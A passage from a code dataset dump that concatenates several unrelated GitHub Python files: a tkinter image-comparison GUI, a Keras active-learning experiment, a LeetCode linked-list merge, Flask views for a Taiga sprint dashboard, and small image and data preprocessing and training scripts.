height=200,width=800)\r\na30['fg']=\"blue2\"\r\na30.config(font=(\"Courier\", 22,\"bold\"))\r\na30['bg']='plum1'\r\n\r\na31=tkinter.Label(win,text=\"Load the Original Image here\")\r\na31.place(x=200,y=250, height=100,width=400)\r\nb31 = tkinter.Button(text = \"Click Here\",command = original_Pic ,activeforeground = \"red\",activebackground = \"pink\",pady=10)\r\nb31.place(x=300,y=350, height=40,width=200)\r\n\r\na31['bg']='plum1'\r\nb31['fg']=\"dodgerblue\"\r\na31.config(font=(\"Georgie\", 20,\"bold\"))\r\nb31['bg']='lightyellow'\r\nb31.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\na32=tkinter.Label(win,text=\"Load the another Image here\")\r\na32.place(x=700,y=250, height=100,width=500)\r\nb32 = tkinter.Button(text = \"Click Here\",command = compare_Pic ,activeforeground = \"red\",activebackground = \"pink\",pady=10)\r\nb32.place(x=820,y=350, height=40,width=200)\r\n\r\na32['bg']='plum1'\r\nb32['fg']=\"dodgerblue\"\r\na32.config(font=(\"Georgie\", 20,\"bold\"))\r\nb32['bg']='lightyellow'\r\nb32.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\nb32 = tkinter.Button(text = \"Go\",command = twentyone ,activeforeground = \"red\",activebackground = \"pink\",pady=10)\r\nb32.place(x=600,y=500, height=40,width=100)\r\nb32['bg']='lightyellow'\r\nb32['fg']=\"red\"\r\nb32.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\n","repo_name":"VivekVashisth07/Face_voice_comparision_and_color_detection_","sub_path":"face_voice_color/face comparision/how_similar_two_images_are2.py","file_name":"how_similar_two_images_are2.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30647010867","text":"'''Original Source from https://github.com/Riashat\n'''\nfrom __future__ import print_function\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport sys\nsys.path.insert(0, '../')\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam\nfrom keras.utils import np_utils, generic_utils\nfrom 
six.moves import range\nimport numpy as np\nimport scipy as sp\nfrom keras import backend as K\nimport random\nrandom.seed(2001)\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom keras.regularizers import l2, activity_l2\nfrom sklearn import metrics\nfrom sklearn.cross_validation import StratifiedShuffleSplit\nfrom imblearn.over_sampling import SMOTE, RandomOverSampler\n\nimport glob as glob\nfrom active_deep_utilities import *\nfrom model_utilities import *\nimport os\nimport argparse\n\ndef run():\n currentScript = os.path.basename(__file__)\n if dataset_type == '0':\n data_files = '../dataset/cropped/zero/*.npz'\n temp = currentScript\n currentScript = \"zeroData_\"+temp\n if oversample:\n save_location = '../Results/Cropped_Results/oversampled/Zeros/' + currentScript\n else:\n save_location = '../Results/Cropped_Results/Zeros/' + currentScript\n elif dataset_type == '-1':\n data_files = '../dataset/cropped/negative_backgrounds/*.npz'\n temp = currentScript\n currentScript = \"negatives_\"+temp\n if oversample:\n save_location = '../Results/Cropped_Results/oversampled/negatives/' + currentScript\n else:\n save_location = '../Results/Cropped_Results/negatives/' + currentScript\n\n save_location = '../Results/Cropped_Results/negatives/' + currentScript\n elif dataset_type == 'scaled_negative':\n data_files = '../dataset/cropped/scaled_negative/*.npz'\n temp = currentScript\n currentScript = \"scaled_negatives_\"+temp\n if oversample:\n save_location = '../Results/Cropped_Results/oversampled/scaled_negatives/' + currentScript\n else:\n save_location = '../Results/Cropped_Results/scaled_negatives/' + currentScript\n else:\n print (\"Pass the appropriate argument for the type of dataset\")\n quit()\n\n all_files = glob.glob(data_files)\n all_files = all_files #load the number of folders indicated in the slice.... loading all will require more memory\n\n batch_size = 128\n nb_classes = 2\n\n # input image dimensions\n img_rows, img_cols = 40, 40\n\n nb_filters = 32\n # size of pooling area for max pooling\n nb_pool = 3\n # convolution kernel size\n nb_conv = 4\n\n nb_epoch = 50\n\n acquisition_iterations = 30 # number of aquisitions from unlabeled samples\n\n dropout_iterations = 5 # number of dropout ROUNDS for uncertainty estimation\n\n active_query_batch = 60 # number to added to the training data after active score evaluation\n # All unlabeled samples could be considered\n\n X_Train_percent = .2 # initial train percent from the entire training set\n x_val_percent = .5 # of leftovers\n\n pool_batch_samples = 600 #Number to sample from the Pool for dropout evaluation\n\n img_dim = img_rows * img_cols #flattened image dimension\n # all_files = all_files[:3]\n XY_Data = fetch_data(all_files, slice_range)\n\n\n X = XY_Data[:, :img_dim]\n y = XY_Data[:, img_dim]\n\n sss = StratifiedShuffleSplit(y, n_experiments, test_size=0.33, random_state=0)\n smote_balancer = SMOTE(random_state=0)\n random_balancer = RandomOverSampler(random_state=0)\n # Number of times to perform experiments... 
Note this is different from the epoch\n e = 0 #starting experiment number\n for train_index, test_index in sss:\n # the data, split between train and test sets\n X_Train_all, X_Test = X[train_index], X[test_index]\n Y_Train_all, Y_Test = y[train_index], y[test_index]\n\n \t# if K.image_data_format() == 'channels_first':\n \t#reshape to appropriate backend format\n X_Train_all = X_Train_all.reshape(X_Train_all.shape[0], 1, img_rows,\n img_cols)\n X_Test = X_Test.reshape(X_Test.shape[0], 1, img_rows, img_cols)\n Y_Test = np_utils.to_categorical(Y_Test, nb_classes)\t#one hot encode Y_Test\n\n\n\n input_shape = (1, img_rows, img_cols)\n #split train set into train, val, and unlabeled pool\n X_Train, Y_Train, X_Pool, Y_Pool = split_train_ratio_based(X_Train_all, Y_Train_all, img_rows = img_rows, img_cols =img_cols, nb_classes= nb_classes,\n X_Train_percent = X_Train_percent, val_percent =x_val_percent)\n\n\n\n #performance evaluation metric for each experiment\n All_auc = list() #Receiver Operator Characteristic data\n All_pre = list()\n All_rec = list()\n All_ap = list()\n All_recall_score = list()\n All_precision_score = list()\n All_confusion_matrix = list()\n X_Pool_All = np.zeros(shape=(1)) #store all the pooled indices\n\n model = build_model(nb_filters, nb_conv, nb_pool, input_shape, nb_classes, X_Train.shape[0], c_param = 3.5)\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n\n model.fit(\n X_Train,\n Y_Train,\n batch_size=batch_size,\n nb_epoch=nb_epoch,\n show_accuracy=True,\n verbose=1)\n\n #collect statistics of performance\n y_predicted = model.predict(X_Test, batch_size=batch_size)\n y_reversed = np.argmax(Y_Test, axis=1)\n y_score = np.argmax(y_predicted, axis =1)\n\n fpr = dict()\n tpr = dict()\n auc = dict()\n #collect statistics for the two classes\n for ci in range(nb_classes):\n fpr[ci], tpr[ci], _ = metrics.roc_curve(Y_Test[:, ci], y_predicted[:, ci])\n auc[ci] = metrics.auc(fpr[ci], tpr[ci])\n\n precision_score = metrics.precision_score(y_reversed, y_score)\n recall_score = metrics.recall_score(y_reversed, y_score)\n precision, recall, _ = metrics.precision_recall_curve(y_reversed, y_score, pos_label = 1)\n average_precision = metrics.average_precision_score(y_reversed, y_score)\n confusion_matrix = metrics.confusion_matrix(y_reversed, y_score)\n print (\"Script :\"+currentScript)\n print (\"Experiment \", e, \"acquisition \", 0)\n print('Average Precision', average_precision, \"precision score\", precision_score, \"recall score \", recall_score)\n print ('AUC', auc)\n\n All_auc.append(auc)\n All_pre.append(precision)\n All_rec.append(recall)\n All_ap.append(average_precision)\n All_recall_score.append(recall_score)\n All_precision_score.append(precision_score)\n All_confusion_matrix.append(confusion_matrix)\n print('Starting Active Learning in Experiment ', e)\n\n for i in range(acquisition_iterations):\n print('POOLING ITERATION', i)\n X_Pool_index = np.asarray(random.sample(range(0, pool_batch_samples), active_query_batch))\n\n Pooled_X = X_Pool[X_Pool_index, :, :, :]\n Pooled_Y = Y_Pool[X_Pool_index]\n\n # Delete the pool set from X_Pool\n X_Pool = np.delete(X_Pool, (X_Pool_index), axis=0)\n Y_Pool = np.delete(Y_Pool, (X_Pool_index), axis=0)\n\n\n X_Train = np.concatenate((X_Train, Pooled_X), axis=0)\n Y_Train = np.concatenate((Y_Train, Pooled_Y), axis=0)\n\n if oversample:\n print (\"Oversamplying\")\n X_Train = X_Train.reshape((X_Train.shape[0], img_rows**2))\n # print (X_Train.shape)\n\n Y_Train = np.argmax(Y_Train, axis=1)\n # print (Y_Train)\n 
min_class_num =np.min(np.bincount(Y_Train.reshape(-1).astype(np.int)))\n if min_class_num < 4:\n # print (\"Random balancer\")\n X_Train, Y_Train =random_balancer.fit_sample(X_Train, Y_Train)\n else:\n X_Train, Y_Train = smote_balancer.fit_sample(X_Train, Y_Train)\n # print (\"Smote balancer\")\n # print (Y_Train)\n\n # print (X_Train.shape)\n # print (Y_Train)\n #reshape it back and continue\n X_Train= X_Train.reshape((X_Train.shape[0], 1, img_rows, img_cols ))\n Y_Train = np_utils.to_categorical(Y_Train, nb_classes)\n\n\n model = build_model(nb_filters, nb_conv, nb_pool, input_shape, nb_classes, X_Train.shape[0], c_param = 3.5)\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n model.fit(\n X_Train,\n Y_Train,\n batch_size=batch_size,\n nb_epoch=nb_epoch,\n show_accuracy=True,\n verbose=1)\n\n #collect statistics of performance\n y_predicted = model.predict(X_Test, batch_size=batch_size)\n y_reversed = np.argmax(Y_Test, axis=1)\n y_score = np.argmax(y_predicted, axis =1)\n\n fpr = dict()\n tpr = dict()\n auc = dict()\n #collect statistics for the two classes\n for ci in range(nb_classes):\n fpr[ci], tpr[ci], _ = metrics.roc_curve(Y_Test[:, ci], y_predicted[:, ci])\n auc[ci] = metrics.auc(fpr[ci], tpr[ci])\n\n precision_score = metrics.precision_score(y_reversed, y_score)\n recall_score = metrics.recall_score(y_reversed, y_score)\n precision, recall, _ = metrics.precision_recall_curve(y_reversed, y_score, pos_label = 1)\n average_precision = metrics.average_precision_score(y_reversed, y_score)\n confusion_matrix = metrics.confusion_matrix(y_reversed, y_score)\n print (\"Script :\"+currentScript)\n print (\"Experiment \", e, \"acquisition \", i)\n print('Average Precision', average_precision, \"precision score\", precision_score, \"recall score \", recall_score)\n print ('AUC', auc)\n\n All_auc.append(auc)\n All_pre.append(precision)\n All_rec.append(recall)\n All_ap.append(average_precision)\n All_recall_score.append(recall_score)\n All_precision_score.append(precision_score)\n All_confusion_matrix.append(confusion_matrix)\n\n print('Saving Results Per Experiment')\n\n np.save(save_location + '_AUC_Experiment_' + str(e) + '.npy', All_auc)\n np.save(save_location + '_PRE_Experiment_' + str(e) + '.npy', All_pre)\n np.save(save_location + '_REC_Experiment_' + str(e) + '.npy', All_rec)\n np.save(save_location+'_AVG_pre_' + str(e) + '.npy', All_ap)\n np.save(save_location+'_recall_score_' + str(e) + '.npy', All_recall_score)\n np.save(save_location+'_precision_score_' + str(e) + '.npy', All_precision_score)\n np.save(save_location+'_confusion_matrix' + str(e) + '.npy', All_confusion_matrix)\n print (\"===================== Experiment number \",e+1, \" completed======================== \" )\n e += 1\n if (e >= n_experiments ):\n break\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ds_type\", \"--dataset_type\", help=\" 0 => '0 Background', -1 -> '=1 Background', scaled_negative => 'Scaled negative background'\")\n parser.add_argument(\"-ovs\", \"--oversampled\", help =\"Oversampled training\", action=\"store_true\")\n parser.add_argument(\"-sr\", \"--slice_range\", help=\"Number of subset to consider\", default=6, type = int)\n parser.add_argument(\"-nexp\", \"--num_exp\", help=\"Number of experiments\", default=3, type = int)\n args = parser.parse_args()\n dataset_type = args.dataset_type\n oversample =args.oversampled\n slice_range = args.slice_range\n n_experiments = args.num_exp\n 
run()\n","repo_name":"charlesity/prostate_segmentation","sub_path":"cropped_data_experiment/active_deep_seg_random.py","file_name":"active_deep_seg_random.py","file_ext":"py","file_size_in_byte":12002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20341868171","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeKLists(self, lists):\n if (not lists):\n return None\n elif (len (lists) == 1):\n return lists[0]\n elif (len (lists) < 3):\n return self.merge (lists[0], lists[1])\n else:\n temp = self.merge (lists[0], lists[1])\n i = 2\n while (i < len (lists)):\n temp = self.merge (temp, lists[i])\n i += 1\n # self.print_l(temp)\n return temp\n\n def merge(self, l1, l2):\n point = head = ListNode (0)\n\n while l1 and l2:\n if l1.val <= l2.val:\n point.next = l1\n l1 = l1.next\n else:\n point.next = l2\n l2 = l1\n l1 = point.next.next\n point = point.next\n if not l1:\n point.next = l2\n else:\n point.next = l1\n return head.next","repo_name":"addherbs/LeetCode","sub_path":"Hard/mergeKsorted_2.py","file_name":"mergeKsorted_2.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29557837764","text":"from datetime import date, timedelta\nfrom datetime import datetime as dt\nfrom sqlalchemy import or_\nfrom flask import session\nfrom flask import request\nfrom flask import current_app\nfrom flask import url_for\nfrom flask import flash\nfrom flask import make_response\nfrom flask import redirect\nfrom flask import abort\nfrom flask import g\nfrom flask_login import login_required\nfrom .auth import current_user\nfrom .taiga import TaigaIssue\nfrom .libutils import calculate_ETAs\nfrom .libutils import get_user_uuid\nfrom .libutils import issues_waiting\nfrom .libutils import max_eta\nfrom .libutils import read_sprint_stats\n\nfrom .gantt import issues_gantt\nfrom .views import TemplateFinderViewBase\nfrom .model import Log\nfrom .model import SprintPoints\nfrom .model import db\n\n\nclass ProjectListView(TemplateFinderViewBase):\n\n @login_required\n def get(self):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n pl = current_app.taiga_client.get_projects()\n # print(\"ProjectListView.get(): pl = \", pl)\n for p in pl:\n p['issue_url'] = \"/projects/%d/issues\" % p['id']\n p['sprint_url'] = \"/projects/%d/sprints\" % p['id']\n context['projects'] = pl\n response = make_response(self.render_template(context))\n # print(\"uuid: \", user.get_id(), \", response: \", response)\n return response\n\n\nclass ProjectIssuesListView(TemplateFinderViewBase):\n\n @login_required\n def get(self, pid):\n context = {}\n user = None\n issues_graph_css_class=\"taigagantt\"\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n TaigaIssue.configure(tc, pid)\n il = tc.get_issues(pid=pid)\n # print(\"ProjectIssuesListView.get(): il = \", il)\n ig = dict(map(lambda x: (x.ref, x), il))\n # print(\"ProjectIssuesListView.get() after map(): il = \", il)\n # now calculate the ETAs for all issues:\n calculate_ETAs(ig)\n last_eta = max_eta(ig)\n tomorrow = date.today() + timedelta(days=1)\n 
flash(\"ETA for the last issue: \" + str(last_eta))\n waiting = issues_waiting(ig)\n if waiting > 0:\n flash(\"There are %d issues waiting\" % waiting)\n active = [ig[i] for i in ig if not ig[i].is_closed]\n aig = dict(map(lambda x: (x.ref, x), active))\n ganttchart = issues_gantt(aig)\n context['issues_graph_css_class'] = issues_graph_css_class\n context['graph'] = ganttchart\n context['issues'] = active\n context['tomorrow'] = tomorrow\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n\nclass ProjectSprintsListView(TemplateFinderViewBase):\n \"\"\"list all the open sprints in this project\"\"\"\n\n @login_required\n def get(self, pid):\n context = {}\n user = None\n issues_graph_css_class=\"taigagantt\"\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n msts = tc.get_milestones(pid=pid)\n today = dt.today().date()\n print(\"ProjectSprintsListView(): msts = \", msts)\n sprintlist = []\n usedsprints = set()\n for mst in msts:\n mst.sprint_url = '/sprint/%d/user_stories' % mst.id\n mst.startdate = mst.estimated_start\n mst.enddate = dt.strptime(mst.estimated_finish, \"%Y-%m-%d\").date()\n # print(\"ProjectSprintsListView.get(): milestone = %s\" % mst)\n mst.is_open = not mst.closed\n if mst.enddate < today:\n mst.overdue = True\n if mst.is_open:\n sprintlist.append(mst)\n usedsprints.add(mst.id)\n else:\n mst.overdue = False\n for mst in msts:\n if mst.id not in usedsprints and mst.is_open \\\n and not mst.overdue:\n sprintlist.append(mst)\n usedsprints.add(mst.id)\n for mst in msts:\n if mst.closed:\n sprintlist.append(mst)\n print(\"ProjectSprintsListView(): sprintlist = \", sprintlist)\n context['sprints'] = sprintlist\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n\nclass ProjectSprintDetailsView(TemplateFinderViewBase):\n \"\"\"list all the open user stories in this sprint\"\"\"\n\n @login_required\n def get(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n today = dt.today()\n msts = tc.get_milestones(pid=pid)\n usl = tc.get_userstories(pid=pid, sprintid=sprintid)\n # print(\"ProjectSprintDetailsView(): msts = \", msts)\n # print(\"ProjectSprintsDetailsView(): usl = \", usl)\n targetsprints = []\n sprinttitle = \"\"\n for mst in msts:\n mst.sprint_url = '/userstories?project=%d' % mst.id\n overdue = dt.strptime(mst.estimated_finish, \"%Y-%m-%d\") < today\n # print(\"ProjectSprintsDetailsView.get(): mst.id = %d, \"\n # \"overdue: %s, closed: %s\" % (mst.id, str(overdue), str(mst.closed)))\n if not mst.closed and mst.id != sprintid and not overdue:\n targetsprints.append(mst)\n if mst.id == sprintid:\n sprinttitle = mst.name\n print(\"found sprint title\", sprinttitle)\n # print(\" -- appended sprint %d\" % mst.id)\n sprint_points = 0\n userstories_ids = []\n # print(\"ProjectSprintsDetailsView.get(): sprintid = %d\" %\n # sprintid)\n for us in usl:\n print(\"ProjectSprintsDetailsView.get(): sprint_points = %d\" %\n sprint_points)\n if not us.is_closed:\n sprint_points += us.total_points\n userstories_ids.append(us.id)\n print(\"ProjectSprintsDetailsView.get(): open userstories = \",\n userstories_ids)\n context['sprintid'] 
= sprintid\n context['sprintname'] = sprinttitle\n context['sprintpoints'] = sprint_points\n context['sprints'] = targetsprints\n context['userstories'] = usl\n context['projectid'] = pid\n session['open_userstories'] = userstories_ids\n # import pdb; pdb.set_trace()\n response = make_response(self.render_template(context))\n return response\n\n @login_required\n def post(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n pc = request.path.split('/')\n pid = pc[2]\n # import pdb; pdb.set_trace()\n try:\n open_userstories = session['open_userstories']\n except:\n raise ValueError(\"\"\"Called from the wrong context: \"\"\"\n \"\"\"No user stories available.\"\"\")\n # don't do anything if the user pressed 'Cancel':\n if 'abort' in request.form:\n return redirect(url_for('project_sprint_list', pid=pid))\n next_sprint = request.form['next_sprint']\n if next_sprint == 'Z':\n flash(\"You need to make a choice for the next sprint\")\n return redirect(request.referer)\n # the user selected the backlog as the target:\n if next_sprint == 'Y':\n r = tc.reassign_userstories_and_close(pid,\n open_userstories,\n sprintid=\"null\")\n flash(\"status code: %d\" % r.status_code)\n return redirect(url_for('project_sprint_list', pid=pid))\n # TBD.\n if next_sprint == 'X':\n return redirect(url_for(\"create_new_sprint\"))\n # else:\n # the user selected the backlog as the target:\n r = tc.reassign_userstories_and_close(pid, open_userstories,\n next_sprint)\n flash(\"status code: %d\" % r.status_code)\n return redirect(url_for('project_sprint_list', pid=pid))\n\n\nclass ProjectSprintAdjustPointsView(TemplateFinderViewBase):\n \"\"\"let the user enter added or deleted points\"\"\"\n\n @login_required\n def get(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n\n tc.autologin()\n mst = tc.get_milestones(pid=pid, sprintid=sprintid)[0]\n context['sprintid'] = sprintid\n context['sprintname'] = mst.name\n context['points'] = mst.total_points\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n @login_required\n def post(self, pid, sprintid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n token = user.token\n tc = current_app.taiga_client\n tc.autologin()\n now = dt.utcnow()\n mst = tc.get_milestones(pid=pid, sprintid=sprintid)[0]\n if 'currentpoints' not in request.form:\n raise ValueError(\"Form submission corrupted\")\n try:\n points = float(request.form['currentpoints'])\n except:\n points = 0.0\n sp = db.session.query(SprintPoints).filter_by(sprintid=sprintid).first()\n if not sp:\n sp = SprintPoints(sprintid=sprintid,\n who=user.name,\n sprintname=mst.name)\n start_points = sp.start_points or \"unset\"\n current_points = sp.current_points or \"unset\"\n print(\"start points: \", start_points,\n \", current points: \", current_points)\n logentry = \"Sprint %d: User '%s' set initial sprint points to %0.2f\" % (\n sprintid, user.name, points)\n if 'process_opening' in request.form:\n print(\" the user pressed the record button\")\n sp.start_points = points\n elif 
'process_current' in request.form:\n logentry = \"Sprint %d: User '%s' updated sprint points to %0.2f\" % (\n sprintid, user.name, points)\n print(\" the user pressed the update button\")\n sp.current_points = points\n # fixup for our broken data set:\n if (sp.start_points is None or sp.start_points == 0.0) and \\\n sp.current_points is not None:\n sp.start_points = sp.current_points\n log = Log(timestamp=now, logentry=logentry)\n db.session.add(sp)\n db.session.add(log)\n db.session.commit()\n print(\"SprintPoints: \", sp)\n context['sprintid'] = sprintid\n context['sprintname'] = mst.name\n context['points'] = mst.total_points\n context['start_points'] = sp.start_points\n context['cur_points'] = sp.current_points\n context['projectid'] = pid\n response = make_response(self.render_template(context))\n return response\n\n\nclass ProjectSprintsStatsView(TemplateFinderViewBase):\n \"\"\"Generate graphs and tables out of the data delivered by the User\n Stories Report\n \"\"\"\n\n @login_required\n def get(self, pid):\n context = {}\n user = None\n try:\n user = g.user\n except:\n c = get_user_uuid(request)\n user = current_user(c)\n api = current_app.config.get('API_URL')\n tc = current_app.taiga_client\n tc.autologin()\n token = user.token\n now = dt.utcnow()\n cfg = current_app.config\n # print(\"UserStoriesStatsView.get%d): config= \" % pid, cfg)\n url = cfg['REPORTS']['project'][pid]['userstories']\n stats = read_sprint_stats(url)\n # now match against the sprint data in our own database\n db_sprints = []\n clauses = []\n for sprint in stats:\n # print(\"sprint = \", sprint)\n clauses.append(SprintPoints.sprintname==sprint)\n print(\"clauses: \", clauses)\n db_sprints = db.session.query(SprintPoints).filter(or_(*clauses)).all()\n print(\"db_sprints: \", db_sprints)\n context['pid'] = pid\n context['sprints'] = stats.values()\n response = make_response(self.render_template(context))\n return response\n","repo_name":"muellert/taigabuddy","sub_path":"src/main/projectviews.py","file_name":"projectviews.py","file_ext":"py","file_size_in_byte":13442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3358044938","text":"import json\n\ndataset_name = input('Dataset name: ')\n\ntry:\n\twith open(f'{dataset_name}.json', encoding='ascii', errors='ignore') as f:\n\t\tdataset = json.load(f)\n\t\tdataset = [\n\t\t '\\n'.join([f'{heartbeat[\"project\"]}|{round(heartbeat[\"time\"])}'\n\t\t for heartbeat in day['heartbeats']])\n\t\t for day in dataset['days']\n\t\t]\nexcept FileNotFoundError:\n\tprint(f'Could not load {dataset_name}.json')\n\ndataset = '\\n'.join(dataset).replace('\\n\\n', '\\n')\n\nwith open(f'{dataset_name}.txt', 'w', encoding='utf-8', newline='\\n', errors='ignore') as f:\n\tf.write(dataset)\n","repo_name":"CelestialCrafter/graphs","sub_path":"codetime/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16057206757","text":"# Finds images from ID in our archive and dumps file locations to .json file\n# Only images where a specific treatment and medium were applied, captured before a cutoff period after inoculation, are considered\n# Optionally copies symlinks to images or image files themselves to pdump directory for inspection/download\n# This should read in arguments from the command line\n# First argument: experiment ID (e.g. 
QFA0060)\n# Second (optional) argument: cutoff time after inoculation (days)\n# If a cutoff time not specified, include all images\n\nimport sys\nimport argparse\nimport os\nimport pandas\nimport colonyzer2.functions as c2\nfrom datetime import datetime\nimport json\nimport shutil\nimport string\nfrom PIL import Image\nfrom PIL import ImageOps\nfrom PIL import ImageFont\nfrom PIL import ImageDraw \n\ndef parseArgs():\n parser=argparse.ArgumentParser(description=\"Get representative image of each plate in archive, sort by date, draw barcode on image and save (small) frame preview.\")\n parser.add_argument(\"pfmt\", type=str, help=\"Format of experiment. Can be one of 96, 384, 76, 1536 or Archive\")\n parser.add_argument(\"-d\",\"--dt\",type=float, help=\"Look for photos taken as close as possible to dt days after first photo.\", default=1.5)\n args = parser.parse_args()\n return(args)\n\ndef reframe(im,wtarg,htarg=0,fill=\"black\"):\n '''Resize image to new target width and height, preserving aspect ratio by adding borders (instead of by cropping).'''\n w,h=im.size\n if htarg==0:\n wsize,hsize=wtarg,int(round((float(wtarg)/w)*h))\n out=im.resize((wsize,hsize),Image.ANTIALIAS)\n elif float(w)/float(h)>=float(wtarg)/float(htarg):\n wsize,hsize=wtarg,int(round((float(wtarg)/float(w))*float(h)))\n tmp=im.resize((wsize,hsize),Image.ANTIALIAS)\n diff=htarg-hsize\n above=sum([x%2 for x in range(diff)])\n below=diff-above\n out=ImageOps.expand(tmp,border=(0,above,0,below),fill=fill)\n else:\n wsize,hsize=int(round((float(htarg)/float(h))*float(w))),htarg\n tmp=im.resize((wsize,hsize),Image.ANTIALIAS)\n diff=wtarg-wsize\n left=sum([x%2 for x in range(diff)])\n right=diff-left\n out=ImageOps.expand(tmp,border=(left,0,right,0),fill=fill)\n return(out)\n\ndef main():\n #sys.argv=['test', '384']\n args=parseArgs()\n pfmt=str(args.pfmt)\n dt=float(args.dt)\n # Should execute this script from LOGS3 directory\n rootDir=os.getcwd() \n\n # Search in some directories for images that can be analysed\n List_96=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT_96\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE_96\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM_96\"]\n List_384=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM\"]\n List_768=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT_768\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE_768\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM_768\"]\n List_1536=[\"/home/yeastimages/CAPTURED_IMAGES_CYTOMAT_1536\",\"/home/yeastimages/CAPTURED_IMAGES_STANDALONE_1536\",\"/home/yeastimages/CAPTURED_IMAGES_WARMROOM_1536\"]\n Archive_384=[\"/home/yeastimages/ARCHIVE_IMAGES\"]\n\n searchOptions={\"96\":List_96,\"384\":List_384+Archive_384,\"768\":List_768,\"1536\":List_1536,\"Archive\":Archive_384}\n searchDirs=searchOptions[pfmt]\n\n barcLen=15 # Make this more general... 
Detect barcode based on date format instead...\n\n barcDict=c2.merge_lodols([c2.getBarcodes(directory,barcRange=(0,barcLen),checkDone=False) for directory in searchDirs])\n barcBest=c2.getNearest(barcDict,dt)\n barcDate={b:c2.getDate(barcBest[b]) for b in barcBest.keys()}\n sortedDate=sorted(barcDate,key=barcDate.get)\n sortedBarcs=sorted(barcDate.keys())\n \n dirname=\"pdump_\"+pfmt\n if os.name==\"posix\":\n font = ImageFont.truetype(\"/usr/share/fonts/truetype/msttcorefonts/arial.ttf\", 80)\n else:\n font = ImageFont.truetype(\"arial.ttf\", 80)\n if os.path.exists(dirname):\n shutil.rmtree(dirname)\n os.mkdir(dirname)\n for i,barc in enumerate(sortedBarcs):\n im=Image.open(barcBest[barc])\n im=reframe(im,1920,1080,fill=\"black\")\n draw = ImageDraw.Draw(im)\n draw.text((400, 200),barc,(255,255,255),font=font)\n draw.text((400, 300),str(barcDate[barc]),(255,255,255),font=font)\n im.save(os.path.join(dirname,pfmt+\"_Frame{:06d}.jpg\".format(i)))\n\nif __name__ == '__main__':\n main()\n\n \n \n","repo_name":"CnrLwlss/HTSauto","sub_path":"HTSscripts/C2MiddleVideo.py","file_name":"C2MiddleVideo.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44496935767","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom listener import Listener\nfrom referential_game_env import ReferentialGameEnv\n\nif __name__ == '__main__':\n listener = Listener(\n vocab_size=200,\n model_path=None\n ).cuda()\n\n envs = ReferentialGameEnv(\n max_len=20,\n eos_id=3,\n noop_penalty=0.5,\n length_penalty=0,\n batch_size=256,\n n_distr=2,\n game_file_path=\"game_file_hard_20.pt\"\n )\n\n dev_envs = ReferentialGameEnv(\n max_len=20,\n eos_id=3,\n noop_penalty=0.5,\n length_penalty=0,\n batch_size=256,\n n_distr=2,\n game_file_path=\"game_file_dev.pt\"\n )\n\n envs.game_file[\"sample_candidates\"] = envs.game_file[\"similarity_rank\"][:, :1000]\n dev_envs.game_file[\"sample_candidates\"] = dev_envs.game_file[\"similarity_rank\"][:, :1000]\n\n optimizer = torch.optim.Adam(listener.parameters())\n try: \n for i in range(100000):\n obs = envs.reset()\n captions = envs.game_file[\"captions\"][obs[\"images_ids\"][range(256), obs[\"goal\"]]]\n images = obs[\"images\"]\n 